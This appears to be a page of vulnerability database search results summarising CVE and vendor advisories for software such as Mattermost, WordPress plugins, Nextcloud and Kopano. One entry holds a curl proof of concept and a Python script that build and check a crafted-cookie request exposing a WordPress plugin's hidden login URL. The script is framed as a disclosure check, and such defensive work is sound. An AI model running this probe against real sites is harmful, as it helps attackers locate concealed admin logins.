1855 matches found
CVE-2022-1982 A crafted SVG attachment can crash a Mattermost server
Uncontrolled resource consumption in Mattermost version 6.6.0 and earlier allows an authenticated attacker to crash the server via a crafted SVG attachment on a post...
CVE-2022-26724
An authentication issue was addressed with improved state management. This issue is fixed in tvOS 15.5. A local user may be able to enable iCloud Photos without authentication...
CVE-2022-29446 WordPress Counter Box plugin <= 1.1.1 - Authenticated Local File Inclusion (LFI) vulnerability
Authenticated (administrator or higher role) Local File Inclusion (LFI) vulnerability in Wow-Company's Counter Box plugin <= 1.1.1 at WordPress...
HC Custom WP-Admin URL <= 1.4 - Unauthenticated Secret URL Disclosure
The plugin leaks the secret login URL when sent a specific crafted request. PoC: curl -sIXGET -H "Cookie: validloginslug=1" https://example.com/wp-login.php -> HTTP/2 302, x-redirect-by: WordPress, location: secret...
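The PoC above is a single curl command whose output has to be read by eye. The following added example (not code from the plugin, the advisory or WordPress) builds the same probe request and parses a raw HTTP response to decide whether the server answered with a WordPress-issued 302 whose Location header carries the hidden login slug. The sample responses, the host example.com and the slug "my-hidden-login" are constructed for the example.

```python
"""Offline check for the HC Custom WP-Admin URL secret-slug leak.

Added example, not the plugin's or the advisory's code. It reproduces the
advisory's PoC request (GET /wp-login.php with the cookie validloginslug=1)
and inspects a raw HTTP response for the leak pattern the advisory shows:
a 302 with x-redirect-by: WordPress and a Location pointing at the hidden
login path. Host, slug and responses below are constructed placeholders.
"""
from __future__ import annotations

from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

PROBE_COOKIE = "validloginslug=1"  # cookie value from the advisory's PoC


def build_probe_request(host: str, path: str = "/wp-login.php") -> bytes:
    """Return the raw HTTP/1.1 request equivalent to the PoC curl command."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"Cookie: {PROBE_COOKIE}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def parse_response(raw: bytes) -> Tuple[int, Dict[str, str]]:
    """Split a raw HTTP response into (status_code, lowercase-keyed headers)."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    # Handles both "HTTP/1.1 302 Found" and the PoC's "HTTP/2 302".
    status = int(status_line.split()[1])
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def leaked_login_slug(raw: bytes, host: str) -> Optional[str]:
    """Return the leaked login slug if the response matches the PoC pattern.

    Conditions: status 302, x-redirect-by: WordPress, and a Location on the
    same host whose path is not the public wp-login.php (that would be an
    ordinary WordPress redirect rather than a disclosure of the hidden slug).
    """
    status, headers = parse_response(raw)
    if status != 302 or headers.get("x-redirect-by", "").lower() != "wordpress":
        return None
    location = headers.get("location")
    if not location:
        return None
    parts = urlsplit(location)
    if parts.netloc and parts.netloc.lower() != host.lower():
        return None
    slug = parts.path.strip("/")
    if not slug or slug.endswith("wp-login.php"):
        return None
    return slug


# Constructed sample responses (not captured from any real site).
LEAKING_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"x-redirect-by: WordPress\r\n"
    b"Location: https://example.com/my-hidden-login\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)
CLEAN_RESPONSE = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html>not found</html>"
)

if __name__ == "__main__":
    print(build_probe_request("example.com").decode())
    print("leaked:", leaked_login_slug(LEAKING_RESPONSE, "example.com"))
    print("clean :", leaked_login_slug(CLEAN_RESPONSE, "example.com"))
```

A positive result means the hidden login path, which is the only protection this kind of plugin offers, is recoverable by anyone who can send one unauthenticated request, so the finding should be handled as an information disclosure and the plugin updated rather than relying on the renamed URL.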
CVE-2022-21151
Processor optimization removal or modification of security-critical code for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access...
CVE-2021-34590
Bender/ebee Charge Controllers in multiple versions are prone to cross-site scripting. An authenticated attacker could write HTML code into configuration values. These values are not properly escaped when displayed...
CVE-2022-24885 Improper Authentication in Nextcloud Android Files
Nextcloud Android app is the Android client for Nextcloud, a self-hosted productivity platform. Prior to version 3.19.1, users can bypass a lock on the Nextcloud app on an Android device by repeatedly reopening the app. Version 3.19.1 contains a fix for the problem. There are currently no known...
PT-2022-9182 · Red Hat · Wildfly Elytron
Name of the Vulnerable Software and Affected Versions: WildFly Elytron affected versions not specified Description: A flaw was found in WildFly Elytron, related to a session fixation exploit when using Undertow, despite Undertow switching the session ID after authentication. Recommendations: At t...
SUSE-SU-2022:0743-2 Security update for cyrus-sasl
This update for cyrus-sasl fixes the following issues: - CVE-2022-24407: Fixed SQL injection in sql_auxprop_store in plugins/sql.c (bsc#1196036). The following non-security bugs were fixed: - postfix: sasl authentication with password fails (bsc#1194265)...
CVE-2020-14479 ICSA-20-147-01 Inductive Automation Ignition (Update B)
Sensitive information can be obtained through the handling of serialized data. The issue results from the lack of proper authentication required to query the server...
CVE-2022-0922 ICSMA-22-088-01 Philips e-Alert
The software does not perform any authentication for critical system functionality...
CVE-2022-26562
An issue in provider/libserver/ECKrbAuth.cpp of Kopano Core <= 6.30 introduced between 6.30.0 RC1e and 6.30.8 final...
PT-2022-17932 · Zarafa +3 · Zarafa Collaboration Platform +3
Name of the Vulnerable Software and Affected Versions: Kopano Core versions 11.0.2.51 and earlier; Zarafa Collaboration Platform versions 6.30 through 6.30.8. Description: The issue allows attackers to authenticate even if the user account or password is expired. This is due to a problem in the...
CVE-2021-45900
Vivoh Webinar Manager before 3.6.3.0 has improper API authentication. When a user logs in to the administration configuration web portlet, a VIVOHAUTH cookie is assigned so that they can be uniquely identified. Certain APIs can be successfully executed without proper authentication. This can let ...
UBUNTU-CVE-2022-0996
A vulnerability was found in the 389 Directory Server that allows users with expired passwords to access the database, resulting in improper authentication...
CVE-2021-27464 Rockwell Automation FactoryTalk AssetCentre SQL Injection
The ArchiveService.rem service in Rockwell Automation FactoryTalk AssetCentre v10.00 and earlier exposes functions lacking proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements...